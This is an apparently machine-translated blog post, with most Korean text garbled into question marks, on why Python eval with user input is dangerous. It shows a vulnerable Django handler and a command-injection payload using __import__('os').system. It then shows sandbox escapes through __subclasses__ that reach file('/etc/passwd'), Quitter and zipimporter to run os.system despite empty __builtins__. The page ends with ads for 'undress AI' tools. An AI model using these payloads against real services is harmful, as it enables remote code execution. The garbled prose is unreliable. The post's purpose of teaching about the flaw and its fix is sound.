? ?? Python eval? ???? ?? ??? ? ?? ??? ?????. ??? ??? ??? ? ??? ????.
?? ?? ?? ???? eval? ??? ???? ?? ?? ??? ?? ??? ??? ??????. ???? ??? eval? ?? ???? ???? ??? ??? eval? ?? ????? ????. ?? ??? ???? ? ??? ??? ??? ? ????. ??? ??? ??? ? ? ??? ???? ???.
??? ?? ??? ?????. ??? ??? [bug83055][1]? ?????.
def remove(request, obj):
query = query2dict(request.POST)
eval(query['oper_type'])(query, customer_obj)??? POST?? ?? ???? ???? oper_type=__import__(? ???? ?? ??? ? ????. URL ???? 'os').system('sleep 5')?? sleep ??? ??? ? ????. ?? ?? ??? ???? ?? ??? ??? ??? ? ????. ??? ????? ???? ???????. ??? ??? ???? ?? ??? ??? ??????
1. ?? ? ?
??? ??? ???? ???? ????.
>>> eval('2+2')
4
>>> eval("""{'name':'xiaoming','ip':'10.10.10.10'}""")
{'ip': '10.10.10.10', 'name': 'xiaoming'}
>>> eval("__import__('os').system('uname')", {})
Linux
0? ? ?? ??? ? ? ? ?? ??? ??? ??? ???? ? ?? ??? ??? ??? ???? Python ??? ???? ?????. . ??? dict? ???, ?? ?? ???? ?? ???? ????? ???. ? ??? ?? ??? ?? ?, ? ??? ??? ???? ????.
eval? eval(source[, globals[, locals]]) -> value
globals? ???? ?? locals? ?-? ???? ???. ???? ??? ?? ? locals
???. 2, ??? ???
(1) ?? ?? ?? ? ??? ??? ??? ????? [??][2]? ????? ????? ??? ??? ?? ??? ??? ???. ?:
def safe_eval(eval_str):
try:
#加入命名空間
safe_dict = {}
safe_dict['True'] = True
safe_dict['False'] = False
return eval(eval_str,{'__builtins__':None},safe_dict)
except Exception,e:
traceback.print_exc()
return ''Here_ _builtins__ ??? ??????? __import__? ?? ?? ??? ??????. ? ???? ??? ?????? ???? ???????:
>>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
List items
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '_', ' debug ', ' doc ', ' import ', ' name ', ' package ', 'abs', 'all', 'any', 'apply', 'basestring', 'bin', 'bool', 'buffer ' , 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'delattr', ' dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr ' , 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', 'issubclass', 'iter', ' len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', 'oct', 'open ' , 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', ' set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars ' , 'xrange', 'zip']
__builtins__?? ?? ??? OS? ?? ??? ???? ? ??? ? ?? __import__? ??? ??? ? ????. ???? ??? ? eval ??? ???? ??? ??? ????.
>>> eval("__import__('os').system('uname')", {'__builtins__':{}})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name '__import__' is not defined?? __import__? ???? ?? ????? ??? ? ??? ???? ?????. ??? ??? ???.
?? ?? ??? ??? ????.
>>> s = """
... (lambda fc=(
... lambda n: [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == n
... ][0]
... ):
... fc("function")(
... fc("code")(
... 0,0,0,0,"test",(),(),(),"","",0,""
... ),{}
... )()
... )()
... """
>>> eval(s, {'__builtins__':{}})
Segmentation fault (core dumped)??? ???? ??? ?????. ? ?? ??? segfault? ?? ??????.
?? ??? ?????? ?????.
>>>
>>> s = """
... [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == "Quitter"
... ][0](0)()
... """
>>> eval(s,{'__builtins__':{}})
liaoxinxi@RCM-RSAS-V6-Dev ~/tools/auto_judge $?? ????? ?? ?? ??:
>>> ().__class__.__bases__[0].__subclasses__() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'Struct'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>]
??? Python ??? ??? Tuple? ???? ?? ?? ?? ?? ???? ??? ?? ?? ??? ?? ?? ?? ???? ?? ????. ?? ?? ???? ??? ??? ?????. ?? ??? zipimporter ??? ??? ?? ? ? ????. ?? ??? ?????
???? ???? ??:
>>> s1 = """
... [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == "file"
... ][0]("/etc/passwd").read()()
... """
>>> eval(s1,{'__builtins__':{}})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 6, in <module>
IOError: file() constructor not accessible in restricted mode? ?? ??? ??? Python ?????? ????? ?????. ???? ??? ? ?? ?? ??? ??? ??? ? ?? ? ?? ??? ?????. ??? ??? ??? ?? ??, ?? ???? ??? ?????. ?? ??? ??? os ??? ???? ?? ?? ??? ?? ??? ? ??? ??????.
>>> s2="""
... [x for x in ().__class__.__bases__[0].__subclasses__()
... if x.__name__ == "zipimporter"][0](
... "/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module(
... "configobj").os.system("uname")
... """
>>> eval(s2,{'__builtins__':{}})
Linux
0??? ??? safe_eval? ??? ???? ??? ?? ?????.
3. ???? ???? ??
(1) ast.literal_eval? ?????
(2) ??? dict? ??? ?? json ??? ??? ? ????
? ?? ??????, ?? ?? ? ???????. , PHP ??? ????? python ??? ???? ??? ??? ???!
? ??? Python ??? ???? ?? ??? ? ?? ?? ??? ?? ?????. ??? ??? PHP ??? ????? ?? ?? ??? ?????!
? AI ??
Undress AI Tool
??? ???? ??
Undresser.AI Undress
???? ?? ??? ??? ?? AI ?? ?
AI Clothes Remover
???? ?? ???? ??? AI ?????.
Clothoff.io
AI ? ???
Video Face Swap
??? ??? AI ?? ?? ??? ???? ?? ???? ??? ?? ????!
?? ??
??? ??
???++7.3.1
???? ?? ?? ?? ???
SublimeText3 ??? ??
??? ??, ???? ?? ????.
???? 13.0.1 ???
??? PHP ?? ?? ??
???? CS6
??? ? ?? ??
SublimeText3 Mac ??
? ??? ?? ?? ?????(SublimeText3)
Python Seaborn ontorplot ?
Jul 26, 2025 am 08:11 AM
Seaborn 's Loctplot? ???? ? ?? ?? ??? ??? ???? ??????. 2. ?? ???? sns.jointPlot (data = tips, x = "total_bill", y = "tip", ?? = "scatter")? ?? ?????. ??? ????? ?????? ??? ??? ?????. 3. ???? ?? ??? ??? = "reg"? ???? marginal_kws? ???? ?? ?? ???? ?????. 4. ??? ??? ? ?? "Hex"? ???? ?? ????.
??? ?? ???? ??? ??
Jul 26, 2025 am 08:00 AM
??? ??? ".join (Words)? ?? join () ???? ?? ? ? ????. 2. ?? ??? ???? ?? MAP (str, ??) ?? [str (x) forxinnumbers]??? ???? ???????. 3. ?? ?? ??? ???? ??? ??? ?????? ???? ?? ?? ? ? ????. 4. '|'.join (f "[{item}]"furiteminitems) ??? ?? join ()? ?? ? ??? ????? ??? ?? ??? ??? ? ????.
Python SQL Server PyODBC ??? ?????
Jul 30, 2025 am 02:53 AM
PyoDBC ?? : PipinStallPyODBC ??? ???? ?????? ??????. 2. SQLSERVER ?? : PYODBC.connect () ???? ?? ????, ??, ??????, UID/PWD ?? Trusted_Connection? ?? ? ?? ???? ???? SQL ?? ?? Windows ??? ?? ?????. 3. ??? ????? ?????? : pyodbc.drivers ()? ???? 'sqlserver'? ?? ? ???? ??? ????? ??? ???? ??? 'sqlserver ? Odbcdriver17? ?? ??? ???? ??? ????? ??????. 4. ?? ???? ? ?? ??
Python Pandas? ??? ?????
Jul 27, 2025 am 02:48 AM
pandas.melt ()? ???? ?? ???? ? ???? ???? ? ?????. ?? ID_VARS? ???? ? ? ??? ???? ????. ??, 4.Value_name = 'score'? ?? ?? ? ? ??? ???? ????? ??, ?? ? ??? ??? ? ?? ?????.
Python Django? ??? ?????
Jul 27, 2025 am 02:50 AM
?? ??, ??? ? ??? ??? ?? ? ContactForm ??? ?????. 2.????, ?? ??? ?? ??? ???? ????, ??? ?? ? ? cleaned_data? ???? ??? ?????. ??? ??? ? ??? ??????. 3. ????? {{form.as_p}}? ???? ??? ????? {%csrf_token%}? ???? CSRF ??? ?????. 4. URL ???? Point / Contact / Contact_View??? ?????. modelform? ???? ??? ?? ???? ??? ??? ??????. ?? ?? ??? ??, HTML ??? ? ?? ????? ?? ??? ????, ?? ??? ?? ??? ?? ??? ?????.
??? ??? ????? Python ???
Jul 28, 2025 am 03:22 AM
pythontanbeoptimizedformemory-boundoperations? Headgroughgenerations, ??? ? ??? ??, ? ManagingObjectLifetimes.first, usegeneratorsinsteadoflistStoprocessLargedAtasetSoneitematime, theintintomemory.second? ?????
cryptocurrencies? ??? ?? ??? ?????? ?? ?? ??? ??? ??????
Jul 30, 2025 pm 09:12 PM
?? ?? ?? ? ?? ?? ??? ??? ??? ???? ?? ???? ?? ???? ???? ?? ?????. ?? ??? ?? ???? ??? ?, ? ?? ??? ????? ?? ???? ??? ? ??? ?? ??? ???? ??? ????. ???? ??? ??? ???? ?? ?? ?? ??? ???? ????? ????? ???? ?????? ????. ??? ??? ?? ??? ?????? ???? ?? ?? ??? ?????. cryptocurrency ???? ??? ?? ??? ?? ?? ??? ? ???? ??? ???? ?? ?? ?? ????. ?? ?? ??? ?? ?? ??? 24 ?? ?? ???? ??? ??, ?? ??? ?? ? ?? ?????? ?? ?????. ? ??? ?? ??? ?? ?? ?? ??? ??? ???? ?????.
??? ??? ? ?? ??
Jul 29, 2025 am 02:20 AM
iter ()? ??? ??? ?? ? ???? ?? ()? ?? ??? ?? ? ?????. 1. iterator ()? ???? ??? ?? ?? ??? ??? ???? ?????. 2. ?? ()? ???? ??? ??? ?? ??? ?? ? ? ??? ?? ??? ??; 3. ?? (???, ???)? ???? ??? ?????. 4. ??? ???? ?? ??? ???? ?? __iter __ () ? __next __ () ???? ???????. ???? ???? ?? ??? ??????? ???? ???? ?? ????? ???? ??????.
